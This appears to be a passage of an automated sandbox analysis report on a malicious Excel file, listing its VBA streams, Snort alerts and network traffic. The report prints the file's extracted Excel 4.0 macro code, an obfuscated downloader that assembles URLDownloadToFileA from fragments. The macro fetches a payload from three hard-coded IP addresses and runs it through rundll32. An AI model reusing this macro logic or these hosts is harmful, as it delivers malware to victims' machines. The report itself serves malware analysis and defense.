                                                                                                                                                Encrypted Document:False
                                                                                                                                                Contains Word Document Stream:
                                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                                Contains Visio Document Stream:
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:True

                                                                                                                                                Summary

                                                                                                                                                Author:Rabota
                                                                                                                                                Last Saved By:Noped
                                                                                                                                                Create Time:2015-06-05T18:19:34Z
                                                                                                                                                Last Saved Time:2021-05-04T08:11:27Z
                                                                                                                                                Creating Application:Microsoft Excel
                                                                                                                                                Security:0

                                                                                                                                                Document Summary

                                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                                Company:
                                                                                                                                                Contains Dirty Links:false
                                                                                                                                                Shared Document:false
                                                                                                                                                Changed Hyperlinks:false
                                                                                                                                                Application Version:16.0300

                                                                                                                                                Streams with VBA

                                                                                                                                                VBA File Name: Blasr.bas, Stream Size: 1166
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Blasr
                                                                                                                                                VBA File Name:Blasr.bas
                                                                                                                                                Stream Size:1166
                                                                                                                                                Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 fd 03 00 00 00 00 00 00 01 00 00 00 1c cc 5e 9c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                "Blasr"
                                                                                                                                                Application.Run
                                                                                                                                                Attribute
                                                                                                                                                Auto_Open()
                                                                                                                                                VB_Name
                                                                                                                                                Private
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Briks.cls, Stream Size: 990
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Briks
                                                                                                                                                VBA File Name:Briks.cls
                                                                                                                                                Stream Size:990
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 1e a1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                "Briks"
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Byutut.bas, Stream Size: 1056
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Byutut
                                                                                                                                                VBA File Name:Byutut.bas
                                                                                                                                                Stream Size:1056
                                                                                                                                                Data ASCII:. . . . . . . . . R . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . ; G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 52 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 59 03 00 00 f5 03 00 00 00 00 00 00 01 00 00 00 1c cc 3b 47 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                "Byutut"
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Class1.cls, Stream Size: 1151
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class1
                                                                                                                                                VBA File Name:Class1.cls
                                                                                                                                                Stream Size:1151
                                                                                                                                                Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 5a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 61 03 00 00 c5 03 00 00 00 00 00 00 01 00 00 00 1c cc a3 ac 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Class2.cls, Stream Size: 999
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class2
                                                                                                                                                VBA File Name:Class2.cls
                                                                                                                                                Stream Size:999
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 7e e9 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Class3.cls, Stream Size: 999
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class3
                                                                                                                                                VBA File Name:Class3.cls
                                                                                                                                                Stream Size:999
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc c8 17 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Kikide.cls, Stream Size: 1249
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Kikide
                                                                                                                                                VBA File Name:Kikide.cls
                                                                                                                                                Stream Size:1249
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . R . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 9a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff a1 03 00 00 29 04 00 00 00 00 00 00 01 00 00 00 1c cc 52 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                "Kikide"
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: UserForm1.frm, Stream Size: 1526
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/UserForm1
                                                                                                                                                VBA File Name:UserForm1.frm
                                                                                                                                                Stream Size:1526
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { \\ . . B . H N . . . . . I . . . . . O < . * N . 7 { / a . . . 0 $ . . . v . K . . . . 1 . . . . . . . . . h : . . L N . . V = . 5 . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 00 01 00 00 9e 04 00 00 e4 00 00 00 84 02 00 00 ff ff ff ff a5 04 00 00 09 05 00 00 00 00 00 00 01 00 00 00 1c cc 2b 09 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 7b 5c fd e6 42 8a 48 4e aa cd df d6 fd 49 99 1c 83 98 07 4f 3c d6 2a 4e ad 37 7b 2f 61 a2 ba cd 30 24 1b a6 ea 76 1d 4b a3 81 e7 c2 31

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Vrest.bas, Stream Size: 679
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Vrest
                                                                                                                                                VBA File Name:Vrest.bas
                                                                                                                                                Stream Size:679
                                                                                                                                                Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 1c cc 27 ea 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                Attribute
                                                                                                                                                "Vrest"
                                                                                                                                                VB_Name
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Vsewd.cls, Stream Size: 990
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Vsewd
                                                                                                                                                VBA File Name:Vsewd.cls
                                                                                                                                                Stream Size:990
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc b2 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                "Vsewd"
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code

                                                                                                                                                Streams

                                                                                                                                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 856
                                                                                                                                                General
                                                                                                                                                Stream Path:PROJECT
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:856
                                                                                                                                                Entropy:5.31019504221
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:I D = " { 4 4 8 1 7 C A 7 - 1 5 D A - 4 D 2 5 - B 4 C E - 4 7 0 F 9 E A 0 E 5 D F } " . . D o c u m e n t = K i k i d e / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = B r i k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = V s e w d / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . C l a s s = C l a s s 2 . . C l a s s = C l a s s 3 . . M o d u l e = B l a s r . . M o d u l e = V r e s t . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4
                                                                                                                                                Data Raw:49 44 3d 22 7b 34 34 38 31 37 43 41 37 2d 31 35 44 41 2d 34 44 32 35 2d 42 34 43 45 2d 34 37 30 46 39 45 41 30 45 35 44 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 69 6b 69 64 65 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 42 72 69 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 79 75 74 75 74 0d 0a 44 6f 63 75 6d 65 6e 74 3d 56 73 65 77
                                                                                                                                                Stream Path: PROJECTwm, File Type: data, Stream Size: 209
                                                                                                                                                General
                                                                                                                                                Stream Path:PROJECTwm
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:209
                                                                                                                                                Entropy:3.32661660177
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:K i k i d e . K . i . k . i . d . e . . . B r i k s . B . r . i . k . s . . . B y u t u t . B . y . u . t . u . t . . . V s e w d . V . s . e . w . d . . . C l a s s 1 . C . l . a . s . s . 1 . . . C l a s s 2 . C . l . a . s . s . 2 . . . C l a s s 3 . C . l . a . s . s . 3 . . . B l a s r . B . l . a . s . r . . . V r e s t . V . r . e . s . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
                                                                                                                                                Data Raw:4b 69 6b 69 64 65 00 4b 00 69 00 6b 00 69 00 64 00 65 00 00 00 42 72 69 6b 73 00 42 00 72 00 69 00 6b 00 73 00 00 00 42 79 75 74 75 74 00 42 00 79 00 75 00 74 00 75 00 74 00 00 00 56 73 65 77 64 00 56 00 73 00 65 00 77 00 64 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 43 6c 61 73 73 32 00 43 00 6c 00 61 00 73 00 73 00 32 00 00 00 43 6c 61 73 73 33 00 43
                                                                                                                                                Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/\x1CompObj
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:97
                                                                                                                                                Entropy:3.61064918306
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/\x3VBFrame
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:266
                                                                                                                                                Entropy:4.62034133633
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                                                Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                                                Stream Path: UserForm1/f, File Type: data, Stream Size: 38
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/f
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:38
                                                                                                                                                Entropy:1.54052096453
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Stream Path: UserForm1/o, File Type: empty, Stream Size: 0
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/o
                                                                                                                                                File Type:empty
                                                                                                                                                Stream Size:0
                                                                                                                                                Entropy:0.0
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:
                                                                                                                                                Data Raw:
                                                                                                                                                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4263
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:4263
                                                                                                                                                Entropy:4.38205341073
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                Stream Path: VBA/dir, File Type: data, Stream Size: 1024
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/dir
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:1024
                                                                                                                                                Entropy:6.73319737871
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                                Data Raw:01 fc b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 be 20 84 62 0e 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                Macro 4.0 Code

                                                                                                                                                ,,"=CONCATENATE(AF80,AG80,AH78,AG78,AG79)",,,,,,"=CONCATENATE(AF80,AG81,AH78,AG78,AG79)",,1,,,,"=CONCATENATE(AF80,AG82,AH78,AG78,AG79)",,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""Grestes"")",,,.d,=NOW(),,,,,at,"=FORMULA(AG85&AG86&AG92,AI83)",,,,"=""http://""","=""91.211.91.81/""",,,=HALT(),,,"=""5.34.179.36/""",,,,,,"=""45.153.229.23/""",,uRlMon,,,,,,,,,,,,JJCCBB,,,,"=""URLDo""",,Belandes,,,,"=""wnloadT""",,,,,,,=GOTO(Blodas!G6),,,,,,,..\Ladfge.VDGfwr,,,,,,,,,,,,,,,,,,,,,,"=""oFileA""",,,,
                                                                                                                                                "=REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)""=Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)""=IF(G12<0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))""=IF(G13<0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))""=IF(G14<0,CLOSE(0),)"=GOTO(Jioka!H4)
                                                                                                                                                ,"=""rund""",,"=""ll32 ..\Ladfge.VDGfwr,DllReg""","=""isterServer""",,,,,=PI()=EXEC(I7&I9&I10)=PI(),,,,=HALT(),

                                                                                                                                                Network Behavior

                                                                                                                                                Snort IDS Alerts

                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                05/04/21-18:12:54.663581TCP1201ATTACK-RESPONSES 403 Forbidden804916591.211.91.81192.168.2.22
                                                                                                                                                05/04/21-18:12:55.411134TCP1201ATTACK-RESPONSES 403 Forbidden80491665.34.179.36192.168.2.22
                                                                                                                                                05/04/21-18:12:55.632035TCP1201ATTACK-RESPONSES 403 Forbidden804916745.153.229.23192.168.2.22

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                May 4, 2021 18:18:30.117866993 CEST4971080192.168.2.591.211.91.81
